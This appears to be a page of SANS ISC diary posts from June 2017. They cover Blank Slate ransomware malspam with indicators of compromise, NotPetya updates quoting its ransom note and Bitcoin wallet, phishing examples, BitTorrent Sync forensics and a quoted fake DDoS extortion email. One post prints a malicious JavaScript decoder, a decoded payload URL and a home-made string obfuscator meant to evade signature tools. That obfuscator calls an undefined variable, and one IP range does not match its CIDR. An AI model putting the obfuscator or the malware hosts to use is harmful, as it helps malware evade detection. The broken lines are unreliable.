Diaries

Published: 2017-06-28

Catching up with Blank Slate: a malspam campaign still going strong

Introduction

"Blank Slate" is the nickname for a malicious spam (malspam) campaign pushing ransomware targeting Windows hosts.  I've already discussed this campaign in a previous diary back in March 2017.  It has consistently sent out malspam since then.  Today I collected 11 Blank Slate emails, so this diary examines recent developments from the Blank Slate campaign.

Today's Blank Slate malspam was pushing Cerber and GlobeImposter ransomware.


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 1 of 3).


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 2 of 3).


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 3 of 3).

The malspam

Normally, emails from this campaign are blank messages with vague subject lines and attachments that don't indicate what it is.  That's why I've been calling it the "Blank Slate" campaign.


Shown above:  Example of a typical Blank Slate email from today, Wednesday 2017-06-28.

However, since yesterday, the Blank Slate campaign has sent several Microsoft-themed messages.  We've seen this before.  As recently as 2017-04-13, I documented Blank Slate malspam using fake Microsoft messages that led to fake Chrome installation pages.  Those fake Chrome pages sent victims zip archives containing malicious .js files designed to infect Windows hosts with ransomware.


Shown above:  Microsoft-themed Blank Slate email from April 2017.

Today's messages look similar to previous Microsoft-themed emails; however, this time they don't have links to a fake Chrome page.  Instead, they have zip attachments containing malicious .js files.


Shown above:  Microsoft-themed Blank Slate email from today, Wednesday 2017-06-28.

Otherwise, these emails are similar to previous waves of Blank Slate malspam.

The attachments

As usual, the zip attachments are double-zipped, and they contain a .js file designed to infect a Windows computer with ransomware.  I saw two types of .js files.  One was about 9 kB in size, and it ran the downloaded ransomware from the user's AppData\Local\Temp directory.  The other type of .js file was about 31 kB in size, and it ran the downloaded ransomware from the user's AppData\Roaming\Microsoft\Windows\Templates directory.


Shown above:  Example of a 9 kB .js file from this wave of malspam.

The traffic

Traffic is also typical of what we've seen before with Blank Slate malspam.  Ransomware binaries are typically downloaded in the clear from a domain name ending with .top.


Shown above:  Ransomware binary downloaded by one of the .js files.

No post-infection traffic was noted for today's GlobeImposter ransomware.  I saw the typical post-infection for today's Cerber samples.


Shown above:  Traffic generated by a Cerber sample from today's malspam, filtered in Wireshark.

Post infection

As others have noted Twitter and elsewhere, recent Cerber samples use "CRBR" as their name in the decryption instructions.  File extensions used by Cerber for any encrypted files consist of 4 characters based on the MachineGuid of the infected Windows host.


Shown above:  Desktop of a Windows host infected with one of today's Cerber samples.


Shown above:  Based on the above MachineGuid, and all my encrypted files end with .BRAD

GlobeImposter also acts the same as we've seen before.  Encrypted files use the .crypt file extension.


Shown above:  Desktop from a Windows host infected with today's GlobeImposter sample.

Indicators of Compromise (IOCs)

The following are SHA256 hashes for the today's extracted .js files:

  • 10358fb055b8d8e0d486eafc66be180d52481667fb63bf4e37bf9cafe5a0dbdb - 7941.js
  • 153b11ae2df30b671bd0bd54af55f83fd2a69e47c8bb924b842bc1b44be65859 - 25601.js
  • 1cbf043831b16ca83eeaff24f70b1a3ea4973d2609e64db33fd82cc0629f1976 - 6935.js
  • 567bb9c835306e02dbedc5f10e32c77a2c6f1c2f28ff49c753f963776a9378b5 - 30085.js
  • 7ecd1253aad0935df1249d6504d3f4090a00466fa159c2ec4e2d141b4b75068f - 9177.js
  • 8b7202a672290e651f9d3c175daaf2b8a3635eba193e925da41bd880a611f2af - 13521.js
  • 8ec6455eb9f8a72fef35e9a330e59153f76b8ebd848c340024669e52589ceb18 - 23288.js
  • b6ab00337d1e40f894ca3959ee9a19e4c9e59605ed1f2563f0bde4df5f76981b - 27465.js
  • c9f71912dd39d4d4ed9f54f6a51f99ee0687e084c2e8782f0b0d729b743e7281 - 3047.js
  • d19233fd99213f5a1d299662d9693eb6bc108d72ce676893bc69c8d309caa54a - 26715.js
  • ed855d0b4cfd5150a4b44a1d3b6c26224e2990743d977804bab926d569aa963b - 24703.js

The following are SHA256 hashes for ransomware samples downloaded by the extracted .js files:

  • 0dc831b502f29d4a6a68da9e511feb8c646af4fcfdeaaee301cb5b0dbaf47c5f - Cerber
  • 703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f - GlobeImposter
  • b1be5af4169014508b17d2de5aa581ea62988cc4d3570ed2ed7f9fb931a5902b - Cerber
  • d1ed3742380539fbef51804e1335c87dd0ef24a6de7f0aa09ce26ad1efe4bcef - Cerber

The following are domains, HTTP requests, and IP addresses associated with today's Blank Slate malspam:

  • 103.52.216.15 port 80 - coolfamerl.top - GET /1  [returned Cerber]
  • 103.52.216.15 port 80 - clippodoops.top - GET /403  [returned GlobeImposter]
  • 103.52.216.15 port 80 - clippodoops.top - GET /1  [returned Cerber]
  • 77.12.57.0 thru 77.12.57.31 (77.12.57.0/27) UDP port 6893  [Cerber post-infection scan]
  • 19.48.17.0 thru 19.48.17.31 (77.12.57.0/27) UDP port 6893  [Cerber post-infection scan]
  • 87.98.176.0 thru 87.98.179.255 (87.98.176.0/22) UDP port 6893  [Cerber post-infection scan]
  • 216.170.123.2 port 80 - xpcx6erilkjced3j.1t2jhk.top - Domain leading to the Cerber decryptor

Email from the GlobeImposter decryption instructions:  chines34@protonmail.ch

Final words

As I noted last time, potential victims must open the zip attachment, open the enclosed zip archive, then double-click the final .js file.  That works on default Windows configurations, but properly-administered Windows hosts and decent email filtering are enough, I think, to keep most people from worrying about Blank Slate.

This is definitely not as serious the recent Petya/NotPetya ransomware outbreak on 2017-06-27.  I still wonder how many people are fooled by Blank Slate malspam.  Does anyone know someone who was actually infected from these emails?  If so, please share your story in the comments section below.

Pcap and malware samples for this ISC diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

1 Comments

Published: 2017-06-28

Petya? I hardly know ya! - an ISC update on the 2017-06-27 ransomware outbreak

This is a follow-up the our previous diary on the ransomware outbreak that happened yesterday on Tuesday 2017-06-27.

Introduction

By now, it seems almost everyone has written something about yesterday's ransomware outbreak.  This led to some confusion after more information became available, and initial reports were updated.  This diary acts as a summary of what we know so far.


Shown above:  Screen shot from a host infected with this ransomware.

What we know so far

This ransomware targets systems running Microsoft Windows.  Although initial reporting called this ransomware Petya or a Petya variant, Kaspersky researchers reported it's a new ransomware.  Kaspersky has been calling the malware NotPetya, and other names have been floating around for it.  However, many people and organizations still call the ransomware Petya or a Petya variant.

This ransomware uses a modified version of the EternalBlue SMB exploit, and it also spreads using other methods like WMI commands, MimiKatz, and PSExec.  Although exploits for EternalBlue are relatively recent, malware has been using file shares and WMI to spread for years, and these older techniques don't require any vulnerabilities.

During the infection process, this ransomware overwrites the MBR with a custom boot loader that implements a tiny malicious kernel.  That tiny kernel encrypts the master file table (MFT) so the file system is unreadable.  The result is an unbootable system that demands a ransom to restore it.  The victim is asked to send $300 USD in Bitcoin to a Bitcoin wallet at 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX.


Shown above:  Nearly 4 Bitcoin received for that Bitcoin wallet as of 2017-06-28 at 16:44 UTC.

Based on public reports, this attack appears to have originated in Ukraine.  According to Krebs on Security the Ukrainian Cyber Police tweeted this attack may have started through a software update mechanism built into M.E.Doc, an accounting program used by companies working with the Ukrainian government.  From the Ukraine, it spread to major European firms like Maersk.

Although we've seen some information on files related to this ransomware, we can only confirm two DLL files as samples of the actual ransomware.  The SHA256 file hashes are:

How can you protect yourself against this threat?  Steps include:

  • Deploy the latest Microsoft patches, especially MS17-010.
  • Consider disabling SMBv1.
  • Restrict who has local administrative access.  Most people can operate with Standard User accounts instead of Administrator accounts.
  • If you have a large or complex infrastructure, segment your network.
  • Keep your anti-virus software up-to-date.  Vendors are constantly updating definitions to cover the latest malware samples.

Most importantly, you should implement a solid backup and recovery procedure for your critical data, just in case the worst happens and you get infected.

Final words

The day after this ransomware attack, our initial excitement has died down a bit.  Affected organizations are conducting response actions, and many others are implementing (or confirming) proper countermeasures.

We hope your organization is following best security practices and is protected against this latest threat.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

7 Comments

Published: 2017-06-27

Checking out the new Petya variant

This is a follow-up from our previous diary about today's ransomware attacks using the new Petya variant.  So far, we've noted:

  • Several hundred more tweets about today's attack can be found on Twitter using #petya.
  • The new Petya variant appears to be using the MS17-010 Eternal Blue exploit to propagate.
  • Others claim the new variant uses WMIC to propagate
  • Still no official word on the initial infection vector in today's attacks.
  • People everywhere are saying today's activity is similar to last month's WannaCry ransomware attacks.

Samples of the new Petya variant are DLL files.  So far, we've confirmed the following two SHA256 file hashes are the new variant:

Examining the new Petya variant

Petya is a ransomware family that works by modifying the infected Windows system's Master Boot Record (MBR).  Using rundll32.exe with #1 as the DLL entry point, I was able to infect hosts in my lab with the above two DLL samples.  The reboot didn't occur right away.  However, when it did, my infected host did a CHKDSK after rebooting. 


Shown above:  An infected host immediately after rebooting.

After CHKDSK finished, the infected Windows host's modified MBR prevented Windows from loading.  Instead, the infected host displayed a ransom message.


Shown above:  The ransom note from a compromised system.

Samples of the new Petya variant appear to have WMI command-line (WMIC) functionality.  Others have confirmed this variant spreads over Windows SMB and is reportedly using the EternalBlue exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.  My infected Windows hosts immediately generated TCP traffic on port 445 and did ARP requests for local network hosts.


Shown above:  Some of the traffic noted in my lab environment.

Keep in mind this is a new variant of Petya ransomware.  I'm still seeing samples of the regular Petya ransomware submitted to places like VirusTotal and other locations.  From what we can tell, those previous versions of Petya are not related to today's attacks.


Shown above:  Difference in ransomware notes between the old and new Petya variants.

New Petya variant ransom message

Ooops, your important files are encrypted.

If you see this text, then your files are no longer accessible, because they have been encrypted.  Perhaps you are busy looking for a way to recover your files, but don't waste your time.  Nobody can recover your files without our decryption service.

We guarantee that you can recover all your files safely and easily.  All you need to do is submit the payment and purchase the decryption key.

Please follow the instructions:

1. Send $300 worth of Bitcoin to the following address:

   1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

2. Send your Bitcoin walled ID and personal installation key to e-mail wowsmith123456@posteo.net. Your personal installation key:

012345-6789ab-cdefgh-ijklmn-opqrst-uvwxyz-ABCDEF-GHIJKL-MNOPQR-STUVWX

If you already purchased your key, please enter it below.
Key:

More reports about the new Petya variant

6 Comments

Published: 2017-06-27

Wide-scale Petya variant ransomware attack noted

Sent from a reader earlier today:

  • Hearing some rumors that the company Merck is having a major virus outbreak with something new and their Europe networks are affected more than their US offices.  Have you heard anything on this?

A quick check reveals that, apparently, another global ransomware attack is making the rounds today.

Initial reports indicate this is much like last month's WannaCry attack.  According to the Verge article, today's ransomware appears to be a new Petya variant called Petyawrap.  At this point, we see plenty of speculation on how the ransomware is spreading (everything from email to an EternalBlue-style SMB exploit), but nothing has been confirmed yet for the initial infection vector.

Alleged samples of this ransomware include the following SHA256 hashes:

AlienVault Open Threat Exchange (OTX) is currently tracking this threat at:

We'll provide more information as it becomes available.

6 Comments

Published: 2017-06-27

A Tale of Two Phishies

Introduction

Has anyone read A Tale of Two Cities, the 1859 novel by Charles Dickens?  Or maybe seen one of the movie adaptations of it?  It's set during the French Revolution, including the Reign of Terror, where revolutionary leaders used violence as an instrument of the government.

In the previous sentence, substitute "violence" with "email."  Then substitute "government" with "criminals."  Now what do you have?  Email being used as an instrument of the criminals!

I know, I know...  No real ties to Dickens' novel here.  A pun for the title is, quite literarily, the best I could do.


Shown above:  That's all I got--a somewhat clever title for this diary.

This diary briefly investigates two phishing emails.  It's a "Tale of Two Phishies" I ran across on Monday 2017-06-26.

First example: an unsophisticated phish

The first example went to my blog's admin email address.  It came from the mail server of an educational institution in Paraguay, possibly used as a relay from an IP address in South Africa.  For email headers, you can only rely on the "Received:" header right before the message hits your mail server.  Anything before that can be spoofed.

It's a pretty poor attempt, because this phishing message is very generic.  I'm educated enough to realize this didn't come from my email provider.  And the login page was obviously fake.  Unfortunately, some people might actually be fooled by this.

The compromised website hosting a fake login page was quickly taken off line.  You won't be able to replicate the traffic by the time you read this.  It's already been submitted to PhishTank.


Shown above:  The first phishing email.


Shown above:  Email headers from the first phishing email.


Shown above:  The fake login page from link in the phishing email.

Second example: a slightly more complex phish

Every time I see a phishing message like this second example, I hope there's malware involved.  But in this case, the email has a PDF attachment with a link to a fake Adobe login page.


Shown above:  The second phishing email.

Examining the PDF attachment, I quickly realized the criminals had made a mistake.  They forgot to put .com at the end of the domain name in the URL from the PDF file.  lillyforklifts should be lillyforklifts.com.  I'd checked the URL early Monday morning with .com at the end of the domain name, and it worked.  When I later checked again for this diary, it had already been taken down.


Shown above:  PDF attachment from the second phishing email.

An elephant in the room

These types of phishes are what I call an "elephant in the room."  That's an English-language metaphor.  "Elephant in the room" represents an obvious issue that no one discusses or challenges.  These types of phishing emails are very much an elephant in the room for a lot of security professionals.  Why?  Because we see far more serious issues during day-to-day operations in our networks.  Many people (including me) feel we have better things to worry about.

But these types of phishing emails are constantly sent.  They represent an on-going threat, however small they might be in comparison to other issues.

Messages with fake login pages for Netflix, Apple, email accounts, banks, and other organizations occur on a daily basis.  For example, on Phishtank.com, the stats page indicates an average of 1,000 to 1,500 unique URLs were submitted on a daily basis during the past month.  Stats for specific months show 58,556 unique URLs submitted in May 2017 alone.

Fortunately, various individuals on Twitter occasionally tweet about the fake login pages they find.  Of course, many people also notify sites like PhishTank, scumware.org, and many other resources to fight this never-ending battle.

So today, it's open discussion on these phishing emails.  Do you know anyone that's been fooled by these messages?  Are there any good resources covering these phishing emails I forgot to mention?  If so, please share your stories or information in the comments section below.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

6 Comments

Published: 2017-06-26

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1)

[This is the first part of a multi-part a guest diary written by Dr. Ali Dehghantanha]

One of the nightmares of any forensics investigator is to come across a new or undocumented platform or application during an investigation with tight deadlines! The investigator has only limited research time to detect evidences hoping not to miss any essential remnants! Fortunately there is a field of research called “Residual Data Forensic” in which researchers detect and document remnants (evidence) of forensic value of user activities on different platforms. Residual forensic researchers are usually listing minimum evidences that can be extracted by a forensics practitioner.

In one of my recent engagements, I had to investigate BitTorrent Sync version 2.0 on a range of different devices. Back then I used papers authored by Scanlon, M., Farina et al., (Refer to References 1,2,3,4) on the investigation of BitTorrent Sync (version 1.1.82). However, as a redesigned folder sharing workflow has been introduced in the newer version of BitTorrent Sync (from version 1.4 onwards), there is a need to develop an up-to-date understanding of the artefacts from the newer BitTorrent Sync applications.

In a series of diaries I am going to discuss about residual artefacts of BitTorrent Sync version 2.0 on Windows 8.1, Mac OS X Mavericks 10.9.5, Ubuntu 14.04.1 LTS, iOS 7.1.2, iPhone 4 running iOS 7.1.2 and a HTC One X running Android KitKat 4.4.4 (For a more involved reading which include experiment setup and full details of our investigation please refer to our paper titled “Forensic Investigation of P2P Cloud Storage: BitTorrent Sync as a Case Study” (Reference 5)). Please feel free to comment about any other evidences that you came across in your investigations and/or suggest other investigation approach.

This diary post explains artefacts of directory listings and files of forensic interest of BitTorrent Sync version 2.0 on Windows 8.1, Mac OS X Mavericks 10.9.5, and Ubuntu 14.04.1 LTS.

The downloaded folders were saved at %Users%\[User Profile]\BitTorrent Sync, /home/[User profile]/BitTorrent Sync, and /Users/[User Profile]/BitTorrent Sync on the Windows 8.1, Ubuntu OS, and Mac OS clients by default, respectively. Within the shared folders (both locally added and downloaded) there is a hidden ‘.sync’ subfolder. The file of particular interest stored within the subfolder is the ‘ID’ file which holds the folder-specific share ID in hex format. The share ID would be especially useful when seeking to identify peers sharing the same folder during network analysis.

When a synced file was deleted, copies of the deleted file can be recovered from the /.sync/Archive folder of the corresponding peer devices. It is important to note that the deleted files will only be kept in the archive folder for 30 days by default. Copies of the deleted files alongside the pertinent file deletion information (e.g., the original paths, file sizes, and deletion times) can be recovered from the %$Recycle.Bin%\SID folder on Windows 8.1, but the files are renamed to a set of random characters prefixed with $R and $I. On Ubuntu machine, copies of deleted files can be recovered from /home/[User Profile]/.local/share/Trash/files folder. Original file path and deletion time can be recovered from .TRASHINFO files located in /home/[User Profile]/.local/share/Trash/info/. In contrast to Windows and Ubuntu OS, examination of the Mac OSX trash folder (located at /Users/[User profile]/.Trash) only recovered copies of the deleted files. However, it is noteworthy that the findings are only applicable to the system that initiated the file deletion and as long as the recycle bin or trash folder is not emptied. A practitioner could potentially recover the BitTorrent Sync usage information from various metadata files resided in the application folder located at %AppData%\Roaming\BitTorrent Sync on Windows 8.1 and /Users/[User Profile/Library/Application Support/BitTorrent Sync on Mac OSX.

The application folder maintains a similar directory structure across multiple operating systems, and the /%BitTorrent Sync%/.SyncUser<Random number> subfolder is an identity-specific application folder that will be synchronised across multiple devices sharing the same identity. The first file of particular interest within the application folder is settings.dat which maintains a list of metadata associated with the device under investigation such as the installation path (which could be distinguished by the ‘exe_path’ entry), installation time in Unix epoch format (‘install_time’), non-encoded peer ID (‘peer_id’), log size (‘log_size’), registered URLs for peer search (‘search_list’, ‘tracker_last’ etc.), and other information of relevance. The second file of forensic interest within the application folder is the sync.dat which contains a wealth of information relating to the shared folders downloaded to the device under investigation. In particular, the device name could be discerned from the ‘device’ entry. The ‘identity’ entry records the identity name (‘name’) of the device under investigation as well as the private (‘private_keys’) and public keys (‘public_keys’) used to establish connections with other devices. A similar finding was observed for the peer identities in ‘identities’ entry. A replication of the ‘identity’ and ‘identities’ entries can be located in the local-identity-specific /%BitTorrent Sync%/.SyncUser<Random number>/identity.dat file and peer-identity-specific /%BitTorrent Sync%/.SyncUser<Random number>/identities/[Certificate fingerprint] file (with the exception of the private key) respectively. The ‘access-requests’ entry holds a list of metadata pertaining to the identities which sent folder access requests to the device under investigation such as the last used IP addresses in network byte order (‘addr’), identity names (‘name’), public keys ‘public_keys’) of the requesting identities, as well as base32-encoded temporary keys (‘invite’), requested folder IDs, requested times (‘req_time’), requested permissions (‘requested_permissions’ where 2 indicates read only, 3 indicates read and write, and 4 indicates owner), and granted permission (‘granted_permissions’).

Located within the ‘folders’ entry of the sync.dat file was metadata relating to the synced folders. It should be noted that this entry will never be empty as it will always contain at least an entry for the identity-specific /%BitTorrent Sync%/SyncUser<Random number> application folder. Amongst the information of forensic interest recoverable from the ‘folders’ entry included the folder IDs (‘folder_id’), storage paths (‘path’), the addition and last modified dates in Unix epoch format, the peer discovery method(s) used to share the synced folders, the access and root certificates keys, whether the folders have been moved to trash, and other information of relevance. Correlating the folder IDs recovered from ‘folders’ entry with the folder IDs located in /%BitTorrent Sync%/SyncUser<Random number>/devices/[Base32-encoded Peer ID]\folders\ may determine the shared folders associated with a peer device. Analysis of the access control list (‘acl’) subentry (of the ‘folders’ entry) can be used to identify the permissions of identities associated with each shared folder, such as the identity names (‘name’), public keys (‘public_keys’), signature issuers, the times when the identities were linked to a specific shared folder, as well as other information of relevance. Similar details can be located in the folder-specific /%BitTorrent Sync%/.SyncUser<Random number>/folders/[Folder ID]/info.dat file. The ‘peers’ subentry (of the ‘folders’ entry), if available, would provide a practitioner information about the peers associated with the shared folders added by the device under investigation such as the last completed sync time (‘last_sync_completed’), last used IP address (‘last_addr’) in network byte order, device name (’name’), last seen time (‘last_seen’), last data sent time (‘last_data_sent’), and other relevant information.

Another file of interest which can potentially allow a practitioner to recover the sync metadata is the /%BitTorrent Sync%/[share-ID].db SQLite3 database. This share-ID-specific database describes the content of a shared folder (including the /%BitTorrent Sync%/SyncUser<Random number> application folder) such as the shared filenames or folders (stored in the ‘path’ table field of the ‘files’ table), hashes, and transfer piece registers for the shared files or folders. Once the shared filenames or folders have been identified, a practitioner may map the details to the /%BitTorrent Sync%/history.dat file (which maintains a list of file syncing events appeared in the History of the BitTorrent Sync client application) to obtain the sync times in Unix epoch format as well as the associated device names – as shown in Figure 1.

Figure 1: History.dat file

/%BitTorrent Sync%/sync.pid file holds the last used process identifier (PID) which can be used to correlate data with physical memory remnants (e.g., mapping a string of relevance to the data resided in the memory space of investigating PID using the ‘yarascan’ function of Volatility). It is important to note that all the metadata files aforementioned are Bencoded (with the exception of the sync.pid file) and the old metadata files would have. OLD extension. Moreover, the sync.dat, settings.dat, and history.dat files are protected with a salted file guard key to ensuring that only the BitTorrent Sync application may edit the files.

When BitTorrent Sync was accessed on a Mac OS device, additional references to the client application usage can be located in the preference files located in /Users/[User profile]/Library/Preferences/. For instance, the com.apple.spotlight.plist file holds the app path and the last used time in plain text (see Figure 2). In the com.bittorrent.Sync.plist file contains supporting information for timeline analysis such as the app version, last software update check time, and last started time in Unix epoch format.

Figure 2: com.apple.spotlight.plist

Disconnecting a shared folder, it was observed that no changes were made to the peer devices, even when the option ‘delete files from this device’ was selected to permanently delete the sync files/folders from the local device. Unlinking an identity from investigated devices, it was observed that the identity-specific /%BitTorrent Sync%/.SyncUser<Random number> application folder will be deleted from the local device. However, only the identity-specific metadata will be removed from the ‘identity’ and ‘identities’ entries of the local and peer device’s settings.dat files.

Undertaking uninstallation of the Windows client application would remove synced folders from folders containing the ‘.sync’ subfolder in the directory listing. Manual uninstallation of the Linux and Mac client applications left no trace of the client application usage/installation in the directory listing, but (obviously) deleted files/folders were recoverable from the non-emptied /Users/[User profile]/.Trash folder of the Mac OSX VM investigated.

Undertaking data carving of unallocated spaces (of the file synchronisation VMs) could recover copies of synced files as well as the log and metadata files of forensic interest (e.g., sync.log, sync.dat, history.dat, and settings.dat used by the client applications). A search for the terms ‘bittorrent’, bencode keys specific to the metadata files of relevance, as well as the pertinent log entries was able to locate copies of the recovered files. The remnants remained even after uninstallation of client applications, which suggested that unallocated space is an important source for recovering deleted BitTorrent Sync or synced files.

Our next post would describe investigation of BitTorrent log files.

References

1)Scanlon, M., Farina, J. and Kechadi, M. T. (2014a) BitTorrent Sync: Network Investigation Methodology, In IEEE, pp. 21–29, [online] Available from: http://ieeexplore.ieee.org/lpdocs/epic03/wrapper.htm?arnumber=6980260 (Accessed 11 March 2015).

2)Scanlon, M., Farina, J., Khac, N. A. L. and Kechadi, T. (2014b) Leveraging Decentralization to Extend the Digital Evidence Acquisition Window: Case Study on BitTorrent Sync, arXiv:1409.8486 [cs], [online] Available from: http://arxiv.org/abs/1409.8486 (Accessed 18 March 2015).

3) Scanlon, M., Farina, J. and Kechadi, M.-T. (2015) Network investigation methodology for BitTorrent Sync: A Peer-to-Peer based file synchronisation service, Computers & Security, [online] Available from: http://www.sciencedirect.com/science/article/pii/S016740481500067X (Accessed 9 July 2015).

4) Farina, J., Scanlon, M. and Kechadi, M. T. (2014) BitTorrent Sync: First Impressions and Digital Forensic Implications, Digital Investigation, Proceedings of the First Annual DFRWS Europe, 11, Supplement 1, pp. S77–S86.

5) Teing Yee Yang, Ali Dehghantanha, Kim-Kwang Raymond Choo, "Forensic Investigation of P2P Cloud Storage: BitTorrent Sync as a Case Study", (Elsevier) International Journal of Computers & Electrical Engineering, 2016.

Find out more about Dr. Ali Dehghantanha at http://www.alid.info

0 Comments

Published: 2017-06-23

Fake DDoS Extortions Continue. Please Forward Us Any Threats You Have Received.

We do continue to receive reports about DDoS extortion e-mail. These e-mails are essentially spammed to the owners of domains based on whois records. They claim to originate from well-known hacker groups like "Anonymous" who have been known to launch DDoS attacks in the past. These e-mails essentially use the notoriety of the group's name to make the threat sound more plausible. But there is no evidence that these threats originate from these groups, and so far we have not seen a single case of a DDoS being launched after a victim received these e-mails. So no reason to pay :)

Here is an example of an e-mail (I anonymized some of the details like the bitcoin address and the domain name)

We are Anonymous hackers group.
Your site [domain name] will be DDoS-ed starting in 24 hours if you don't pay only 0.05 Bitcoins @ [bit coin address]
Users will not be able to access sites host with you at all.
If you don't pay in next 24 hours, attack will start, your service going down permanently. Price to stop will increase to 1 BTC and will go up 1 BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - over 1 Tbps per second. No cheap protection will help.
Prevent it all with just 0.05 BTC @ [bitcoin address]
Do not reply, we will not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

This particular e-mail was rather cheap. Other e-mails asked for up to 10 BTC. 

There is absolutely no reason to pay any of these ransoms. But if you receive an e-mail like this, there are a couple of things you can do:

  • Verify your DDoS plan: Do you have an agreement with an anti-DDoS provider? A contact at your ISP? Try to make sure everything is set up and working right.
  • We have seen these threats being issued against domains that are not in use. It may be best to remove DNS for the domain if this is the case, so your network will not be affected. 
  • Attackers often run short tests before launching a DDoS attack. Can you see any evidence of that? A brief, unexplained traffic spike? If so, then take a closer look, and it may make the threat more serious if you can detect an actual test. The purpose of the test is often to assess the firepower needed to DDoS your network

And please forward any e-mails like this to us. It would be nice to get a few more samples to look for any patterns. Like I said above, this isn't new, but people appear to still pay up to these fake threats.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

2 Comments

Published: 2017-06-22

Obfuscating without XOR

Malicious files are generated and spread over the wild Internet daily (read: "hourly"). The goal of the attackers is to use files that are:

  • not know by signature-based solutions
  • not easy to read for the human eye

That’s why many obfuscation techniques exist to lure automated tools and security analysts. In most cases, it’s just a question of time to decode the obfuscated data. A classic technique is to use the XOR cypher[1]. This is definitively not a new technique (see a previous diary[2] from 2012) but it still heavily used. And many tools can automate the search for XOR’d string. Viper, the binary analysis and management framework, is a good example. It can scan for XOR'd strings easily:

viper tmpnYaBJs > xor -a
[*] Searching for the following strings:
- This Program
- GetSystemDirectory
- CreateFile
- IsBadReadPtr
- IsBadWritePtrGetProcAddress
- LoadLibrary
- WinExec
- CreateFileShellExecute
- CloseHandle
- UrlDownloadToFile
- GetTempPath
- ReadFile
- WriteFile
- SetFilePointer
- GetProcAddr
- VirtualAlloc
- http
[*] Hold on, this might take a while...
[*] Searching XOR
[!] Matched: http with key: 0x74
[*] Searching ROT
viper tmpnYaBJs >

Today, many Javascript or VBS files implement other obfuscation techniques that do not rely on XOR. Yesterday, I found a sample that had such behaviour. A first quick analysis revealed that almost no string was in clear text in the source and a function was called in place of regular strings like:

var bcacfdfaebbbfDeck = new ActiveXObject(dbdbfaeefccaee('+L+^%^LK%,LpL(KeL^%z%+%u%u',1));

I took some time to check how the obfuscation was performed. How does it work?

The position of each character is searched in the $data variable and decreased by one. Then the character at this position is returned to build a string of hex codes. Finally, the hex codes are converted into the final string. Example with the two first characters of the example above:

$data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";

  • "+" is located at pos 20, search the character at position 19 (20 - 1): "5"
  • "L" is located at pos 5, search the character at position 4 (5 - 1): "7"
  • "57" is the hex code for "W"
  • etc...

Here is the beautified code from the malicious file:

// Convert a string from hex chars to string.
// In: “575363726970742E7368656C6C"
// Out: "WScript.shell"
function hex2string(hexstring) {
    var bufferin = hexstring.toString();
    var bufferout = '';
    for (var i = 0; i < bufferin.length; i += 2)
        bufferout += String.fromCharCode(parseInt(bufferin.substr(i, 2), 16));
    return bufferout;
}

// Convert the obfuscate string by shifting by 1 char 
function deobfuscate(string,step){
    var data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";
    var bufferout = "";
    var l = data.length-1;
    var size = string.length;    

    for (var i = 0; i <size ; i++){        
        var p = data.indexOf(string.charAt(i));        
        var p2 = p - step;        
        if (p2 < 0) {            
            p2 = l - Math.abs(p2);
            var l2 = l - 1;            
            if (p2==l2)
               p2 = p2 + step;
        }
        bufferout = bufferout + data.charAt(p2);
    }
    // Convert to string
    return hex2string(bufferout);
}

This code:

var s = deobfuscate('%zL(L(Lp^2KNKN^P^z^+Ke^P^+^(Ke^+^KKe^P^p^PKN%u%N%L%NKe%,%0%L',1);
WScript.Echo(s);

Returns:

hxxp://185.154.52.101/logo.img

And when you understand how to deobfuscate, it’s easy to write the opposite function. So I quickly wrote the function to obfuscate any string based on the same technique:

function obfuscate(string,step){
    var data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";
    var bufferout = "";
    var l = data.length-1;
    var size = string.length;
    for (var i = 0; i <size ; i++){
        var hvalue = Number(string.charCodeAt(i)).toString(16).toUpperCase();
        for (var j=0; j < 2; j++) {
            var p = data.indexOf(hvalue.charAt(j));
            var p2 = p + step;
            if (p2<0) {            
                p2 = l + Math.abs(p2);
                var l2 = l + 1;            
                if (p2==l2)
                    p2 = p2 - step;
            }
            bufferout = bufferout + data.charAt(bdfcbaddccffada);
        }
    }
    return bufferout;
}

This code:

var foo = obfuscate("https://isc.sans.edu", 1);
WScript.echo(foo);

Returns:

%zL(L(LpL^^2KNKN%,L^%^KeL^%P%eL^Ke%+%(L+

Of course, the method analyzed here is a one shot! The number of ways to obfuscate data is unlimited...

[1] https://en.wikipedia.org/wiki/XOR_cipher
[2] https://isc.sans.edu/forums/diary/Decoding+Common+XOR+Obfuscation+in+Malicious+Code/13354

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

1 Comments

Published: 2017-06-21

It has been a month and a bit how is your new patching program holding up?

Last month's entertainment for many of us was of course the wannacray ms17-010 update. For some of you it was a relaxing time just like any other month.  Unfortunately for the rest of us it was a rather busy period trying to patch systems that in some cases had not been patched in months or even years. Others discovered that whilst security teams have been saying "you want to open what port to the internet?" firewall rules were approved allowing port 445 and in other cases even 139. Another group of users discovered that the firewall that used to be enabled on their laptop was no longer enabled whilst connected to the internet.  Anyway, that was last month.  On the back of it we all made improvements to our vulnerability management processes. You did, right?

Ok, maybe not yet, people are still hurting.  However, when an event like this happens it is a good opportunity to revisit the process that has failed, identify why it went wrong for you and make improvements.  Not the sexy part of security, but we can't all be threathunting 24/7. 

If you haven't started yet or the new process isn't quite where it needs to be where do you start? 
